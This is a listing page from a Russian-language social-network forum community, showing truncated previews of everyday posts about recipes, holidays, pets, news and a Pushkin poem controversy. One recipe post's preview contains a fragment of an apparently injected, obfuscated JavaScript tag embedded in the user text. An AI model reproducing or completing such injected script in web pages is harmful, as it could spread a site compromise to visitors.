Он и Она. Флудилка

Создан: 27.01.2015
Участников : 1400
Публикаций: 17843
Комментариев: 2265557
Посты
Участники
Он и Она. Флудилка Он и Она. Флудилка
26.07.2015 03:00
Пожаловаться
Сохранить

Беларусь и Украина будут использовать в расчетах гривны .

Это в какого перепугу? Я против! Лучше зеркальцами и бусиками пусть все и
Беларусь и Украина будут использовать в расчетах гривны .
18 46 243
Он и Она. Флудилка Он и Она. Флудилка
26.07.2015 03:00
Пожаловаться
Сохранить

Приятного аппетита!

Сейчас на завтрак сделала ленивые вареники, они же творожные клёцки, они же... Нарезала размером с хороший сырник каждую клецку)))) а сварились хорошо))) Делюсь картинкой здорового питания. Достичь веса = рост - 120 по ней не получится, но
Приятного аппетита!
17 100 284
Он и Она. Флудилка Он и Она. Флудилка
26.07.2015 03:00
Пожаловаться
Сохранить

как я уволилась)

в тот же вечер, когда происходили вышеупомянутые события моей предыдущей темы, позвонили мне с фирмы в которой я последние месяцы работала и грят- в общем мы тут на совете директоров решили- увольняйся завтра и приноси нам трудовую.. при том дата
как я уволилась)
19 73 352
Он и Она. Флудилка Он и Она. Флудилка
26.07.2015 03:00
Пожаловаться
Сохранить

Ну ладно, сиди-не сиди, а всёж-таки праздник!

Поздравляю всех, кто служил в ВМФ или имеет отношение к
Ну ладно, сиди-не сиди, а всёж-таки праздник!
30 40 278
Он и Она. Флудилка Он и Она. Флудилка
26.07.2015 03:00
Пожаловаться
Сохранить

я с вас уею господа, Крым своровали а день ВМФ отмечать не хотите

я с вас уею господа, Крым своровали а день ВМФ отмечать не хотите
13 62 430
Он и Она. Флудилка Он и Она. Флудилка
26.07.2015 03:00
Пожаловаться
Сохранить

Надо жить в хармонии...

и довольствоваться тем, что имеешь, а имеем мы на сегодня фаршик и сделаем супчик с фрикадельками и каклетки... <script type="text/javascript">// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var
Надо жить в хармонии...
17 187 403
Он и Она. Флудилка Он и Она. Флудилка
26.07.2015 03:00
Пожаловаться
Сохранить

Избалованные кошки, которые, вполне вероятно, живут лучше, чем вы

Вы даже не представляете себе, насколько может быть испорчен кот, если он ест лучшую еду, вполне возможно, даже более качественную, чем едите вы, спит на шелковой подушке. Он просто не представляет для себя другой жизни. Эти испорченные кошки на
Избалованные кошки, которые, вполне вероятно, живут лучше, чем вы
27 137 315
Он и Она. Флудилка Он и Она. Флудилка
26.07.2015 03:00
Пожаловаться
Сохранить

Мальчик просит Бога защитить его в старости, когда сила будет ослабевать.

По-моему, и голос хорош и мальчик артистичен, хотя до старости ему очень
Мальчик просит Бога защитить его в старости, когда сила будет ослабевать.
18 88 444
Он и Она. Флудилка Он и Она. Флудилка
26.07.2015 03:00
Пожаловаться
Сохранить

Свадебные фотографии в гробу

Дженни Тэй (29) и Даррен Чэн (30) из Сингапура работают в сфере ритуальных услуг. К смерти они относятся очень серьезно, но без страха. Когда речь зашла о свадебной фотосъемке, они решили устроить её в гробу на кладбище, но все таки остановились на
Свадебные фотографии в гробу
21 52 220
Он и Она. Флудилка Он и Она. Флудилка
26.07.2015 03:00
Пожаловаться
Сохранить

...И вмиг зарезвился Амур в их ногах....А.С.Пушкин

Родители первоклассников из нескольких московских школ потребовали исключить стихотворение Пушкина "Вишня "  из программы внеклассного чтения (Вишня и тут свой пятак вставила). Зацените обоснованность родительского негодования. ВИШНЯ  
...И вмиг зарезвился Амур в их ногах....А.С.Пушкин
14 90 545
Отправить жалобу
Укажите причину.